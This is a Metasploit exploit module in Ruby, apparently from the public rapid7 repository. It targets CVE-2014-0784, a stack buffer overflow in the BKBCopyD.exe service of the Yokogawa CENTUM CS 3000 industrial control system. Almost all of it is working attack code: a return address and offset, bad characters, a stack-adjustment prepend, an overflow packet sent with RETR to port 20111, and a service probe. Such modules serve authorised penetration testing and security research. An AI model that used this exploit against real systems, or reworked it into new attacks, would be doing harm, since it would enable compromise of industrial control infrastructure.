GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/windows/scada/yokogawa_bkbcopyd_bof.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::Tcp

  def initialize(info = {})
    super(update_info(info,
      'Name' => 'Yokogawa CENTUM CS 3000 BKBCopyD.exe Buffer Overflow',
      'Description' => %q{
        This module exploits a stack based buffer overflow in Yokogawa CENTUM CS 3000. The vulnerability
        exists in the service BKBCopyD.exe when handling specially crafted packets. This module has
        been tested successfully on Yokogawa CENTUM CS 3000 R3.08.50 over Windows XP SP3.
      },
      'Author' =>
        [
          'juan vazquez',
          'Redsadic <julian.vilas[at]gmail.com>'
        ],
      'References' =>
        [
          [ 'URL', 'http://www.yokogawa.com/dcs/security/ysar/YSAR-14-0001E.pdf' ],
          [ 'URL', 'https://www.rapid7.com/blog/post/2014/03/10/yokogawa-centum-cs3000-vulnerabilities' ],
          [ 'CVE', '2014-0784']
        ],
      'Payload' =>
        {
          'Space' => 373, # 500 for the full RETR argument
          'DisableNops' => true,
          'BadChars' => "\x00\x0d\x0a\xff",
          'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff\xff\xff" # Stack adjustment # add esp, -3500 # double \xff char to put it on memory
        },
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'thread',
        },
      'Platform' => 'win',
      'Targets' =>
        [
          [ 'Yokogawa CENTUM CS 3000 R3.08.50 / Windows XP SP3',
            {
              'Ret' => 0x6404625d, # push esp # ret # libBKBUtil.dll
              'Offset' => 123
            }
          ],
        ],
      'DisclosureDate' => '2014-03-10',
      'DefaultTarget' => 0))

    register_options(
      [
        Opt::RPORT(20111)
      ])
  end

  def check
    pkt = build_probe
    res = send_pkt(pkt)
    if valid_response?(res)
      return Exploit::CheckCode::Detected
    end

    Exploit::CheckCode::Safe
  end


  def exploit
    data = "RETR "
    data << rand_text(target['Offset'])
    data << [target.ret].pack("V")
    data << payload.encoded
    data << "\n"

    print_status("Trying target #{target.name}, sending #{data.length} bytes...")
    connect
    sock.put(data)
    disconnect
  end

  def build_probe
    "#{rand_text_alpha(10)}\n"
  end

  def send_pkt(data)
    connect
    sock.put(data)
    data = sock.get_once
    disconnect

    return data
  end

  def valid_response?(data)
    return false unless !!data
    return false unless data =~ /500 'yyparse error': command not understood/
    return true
  end
end